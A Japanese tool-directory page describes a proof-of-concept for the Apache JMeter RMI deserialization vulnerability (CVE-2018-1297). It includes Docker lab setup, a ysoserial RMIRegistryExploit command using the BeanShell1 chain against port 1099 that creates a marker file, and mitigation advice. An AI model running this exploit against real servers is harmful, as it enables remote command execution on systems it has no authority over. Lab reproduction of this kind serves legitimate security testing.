Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Jmeter-CVE-2018-1297- — Apache JMeter RMIデシリアライゼーション脆弱性(CVE-2018-1297)の概念実証エクスプロイト。ysoserialペイロードを介したリモートコマンド実行を可能にします。 | Kitploit
ツール/GitHubGitHub/48484848484848/jmeter-cve-2018-1297-
ペイロード生成脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHub48484848484848/jmeter-cve-2018-1297-

Jmeter-CVE-2018-1297-

Apache JMeter RMIデシリアライゼーション脆弱性(CVE-2018-1297)の概念実証エクスプロイト。ysoserialペイロードを介したリモートコマンド実行を可能にします。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Jmeter RMI デシリアライズ コマンド実行脆弱性 (CVE-2018-1297)



Apache JMeterは、アメリカのApache Software FoundationがストレステストおよびパフォーマンステストのためにJava言語で作成したオープンソースソフトウェアセットです。
2.xおよび3.xバージョンにはデシリアライズ脆弱性が存在し、攻撃者はこの脆弱性を悪用して対象サーバー上で任意のコマンドを実行できます。

脆弱性環境の実行:


root@kitploit:~
docker compose up -d

私はKali Linuxでdockerを使用しました。

実行が完了すると、RMIサービスが起動し、ポート1099をリッスンします。


脆弱性:


ysoserialを直接使用して脆弱性攻撃を実行します。
root@kitploit:~
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/success’

上記のようなコマンドを入力します。
BeanShell1というエクスプロイトチェーンを使用しました。

root@kitploit:~
docker compose exec jmeter bash

を使用してコンテナに入ると、'/tmp/success'が正常に作成されたことがわかります。


整理


この脆弱性は、Javaベースのアプリケーションで発生する可能性のあるRMI(Remote Method Invocation)脆弱性を悪用するものです。
ここで使用された‘ysoserial-0.0.6-SNAPSHOT-all.jar’はysoserialプロジェクトの一部であり、Javaのシリアライズ脆弱性を悪用してリモートコード実行を可能にするペイロードを生成するために使用されます。

このペイロードは、/tmp/successのようなコマンドを実行する目的を持っており、この脆弱性を通じて攻撃者はリモートシステム上で任意のコマンドを実行したり、システムファイルを改ざんしたりすることができます。
この脆弱性を防ぐための対策としては、RMIサービスのアクセス制限、厳格な権限制御、Javaシリアライズフィルタリングなどがあります。
ツールをダウンロード